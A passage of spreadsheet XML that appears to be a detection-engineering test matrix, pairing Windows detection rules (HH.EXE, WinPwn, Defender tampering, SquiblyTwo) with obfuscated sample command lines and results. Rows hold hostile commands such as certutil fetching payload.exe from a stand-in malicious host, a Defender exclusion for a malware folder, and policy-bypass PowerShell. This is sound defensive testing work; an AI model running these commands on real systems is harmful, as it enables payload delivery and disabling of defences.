          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1052" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1052" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1052" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1052" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1052" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1052" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1053" ht="15.75" customHeight="1" s="42">
      <c r="A1053" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1053" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1053" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1053" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1053" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1053" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1053" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1053" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1053" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1053" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1053" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1054" ht="15.75" customHeight="1" s="42">
      <c r="A1054" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1054" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1054" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1054" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1054" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1054" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1054" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1054" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1054" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1054" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1054" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1055" ht="15.75" customHeight="1" s="42">
      <c r="A1055" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1055" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1055" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1055" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1055" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1055" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1055" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1055" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1055" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1055" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1055" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1056" ht="15.75" customHeight="1" s="42">
      <c r="A1056" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1056" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1056" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1056" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1056" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1056" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1056" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1056" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1056" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1056" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1056" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1057" ht="15.75" customHeight="1" s="42">
      <c r="A1057" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1057" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1057" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1057" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1057" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1057" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1057" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1057" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1057" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1057" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1057" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1058" ht="15.75" customHeight="1" s="42">
      <c r="A1058" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1058" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1058" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1058" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1058" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1058" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1058" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1058" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1058" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1058" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1058" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1059" ht="15.75" customHeight="1" s="42">
      <c r="A1059" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1059" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1059" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1059" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1059" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1059" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1059" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1059" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1059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059" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1059" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1060" ht="15.75" customHeight="1" s="42">
      <c r="A1060" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1060" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1060" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1060" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1060" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1060" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1060" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1060" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1060" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1060" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1060" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1061" ht="15.75" customHeight="1" s="42">
      <c r="A1061" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1061" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1061" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1061" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1061" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1061" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1061" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1061" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1061" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1061" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1061" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1062" ht="15.75" customHeight="1" s="42">
      <c r="A1062" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1062" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1062" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1062" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1062" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1062" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1062" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1062" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1062" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1062" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1062" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1063" ht="15.75" customHeight="1" s="42">
      <c r="A1063" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1063" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1063" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1063" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1063" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1063" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1063" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1063" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1063" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1063" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1063" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1064" ht="15.75" customHeight="1" s="42">
      <c r="A1064" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1064" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1064" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1064" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1064" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1064" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1064" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1064" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1064" s="43" t="n"/>
      <c r="J1064" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1064" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1065" ht="15.75" customHeight="1" s="42">
      <c r="A1065" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1065" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1065" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1065" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1065" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1065" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1065" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1065" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1065" s="43" t="n"/>
      <c r="J1065" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1065" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1066" ht="15.75" customHeight="1" s="42">
      <c r="A1066" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1066" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1066" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1066" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1066" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1066" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1066" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1066" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1066" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1066" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1066" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1067" ht="15.75" customHeight="1" s="42">
      <c r="A1067" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1067" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1067" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1067" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1067" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1067" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1067" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1067" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1067" s="36" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1067" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1067" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1068" ht="15.75" customHeight="1" s="42">
      <c r="A1068" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1068" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1068" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1068" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1068" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1068" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1068" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1068" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1068" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1068" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1068" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1069" ht="15.75" customHeight="1" s="42">
      <c r="A1069" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1069" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1069" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1069" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1069" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1069" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1069" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1069" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1069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069" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1069" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1070" ht="15.75" customHeight="1" s="42">
      <c r="A1070" s="43" t="n"/>
      <c r="B1070" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1070" s="36" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1070" s="36" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1070" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1070" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1070" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1070" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1070" s="36" t="n"/>
      <c r="J1070" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1070" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1071" ht="15.75" customHeight="1" s="42">
      <c r="A1071" s="43" t="n"/>
      <c r="B1071" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1071" s="36" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1071" s="36" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1071" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1071" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1071" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1071" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1071" s="36" t="n"/>
      <c r="J1071" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1071" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1072" ht="15.75" customHeight="1" s="42">
      <c r="A1072" s="43" t="n"/>
      <c r="B1072" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1072" s="36" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1072" s="36" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1072" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1072" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1072" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1072" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1072" s="43" t="n"/>
      <c r="J1072" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1072" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1073" ht="15.75" customHeight="1" s="42">
      <c r="A1073" s="43" t="n"/>
      <c r="B1073" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1073" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1073" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1073" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1073" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1073" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1073" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1073" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1073" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1073" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1074" ht="15.75" customHeight="1" s="42">
      <c r="A1074" s="43" t="n"/>
      <c r="B1074" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1074" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1074" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1074" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1074" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1074" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1074" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1074" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1074" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1074" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1075" ht="15.75" customHeight="1" s="42">
      <c r="A1075" s="43" t="n"/>
      <c r="B1075" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1075" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1075" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1075" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1075" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1075" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1075" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1075" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1075" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1075" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1076" ht="15.75" customHeight="1" s="42">
      <c r="A1076" s="43" t="n"/>
      <c r="B1076" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1076" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1076" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1076" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1076" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1076" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1076" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1076" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1076" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1076" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1077" ht="15.75" customHeight="1" s="42">
      <c r="A1077" s="43" t="n"/>
      <c r="B1077" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1077" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1077" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1077" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1077" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1077" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1077" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1077" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1077" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1077" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1078" ht="15.75" customHeight="1" s="42">
      <c r="A1078" s="43" t="n"/>
      <c r="B1078" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1078" s="36" t="inlineStr">
        <is>
